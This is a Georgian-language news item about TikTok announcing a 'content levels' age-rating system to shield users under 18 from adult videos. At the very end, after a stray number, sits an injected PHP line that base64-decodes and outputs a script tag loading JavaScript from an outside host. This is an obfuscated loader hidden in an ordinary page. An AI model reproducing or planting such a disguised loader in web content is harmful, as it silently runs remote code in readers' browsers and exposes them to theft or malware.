celsiusi
ავერსი შნაიდერი

პოპულარულმა სოციალური მედიის პლატფორმამ TikTok-მა დააანონსა რეიტინგის სისტემის დანერგვა, რომელიც მიზნად ისახავს ახალგაზრდა მომხმარებლების დაცვას შეუსაბამო შინაარსისგან.

გადაწყვეტილება ქსელის ადმინისტრაციამ მას შემდეგ მიიღო, რაც ბოლო თვეებში კანონმდებლები და ადვოკატები აკრიტიკებდნენ აპლიკაციაში მავნე პოსტების გავრცელებას, განსაკუთრებით ისეთებს, რომლებიც ჩნდება ახალგაზრდა მომხმარებლების არხებში.

რეიტინგის სისტემა, სახელწოდებით „შინაარსის დონეები“, დაახარისხებს ვიდეოებს, კერძოდ, მასალის შესაბამისობას ასაკის მიხედვით. კომპანიის ცნობით, ცვლილებები 18 წლამდე მომხმარებლებს აარიდებს გარკვეულ კონტენტის ნახვას, რომელიც ზრდასრულებისთვისაა განკუთვნილი.

"ჩვენ გვსურს. ვითამაშოთ პოზიტიური როლი იმ ადამიანების ცხოვრებაში, რომლებიც იყენებენ ჩვენს აპს, და ჩვენ მზად ვართ შევქმნათ ისეთი გარემო, რომელშიც ადამიანებს შეუძლიათ გამოხატონ საკუთარი თავი სხვადასხვა თემებზე, ასევე, დავიცვათ პოტენციურად რთული ან შეუსაბამო გამოცდილებისგან“ - განაცხადეს კომპანიაში.

ადმინისტრაციის ინფორმაციით, სისტემა უახლოეს კვირებში ამოქმედდება. 

562
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");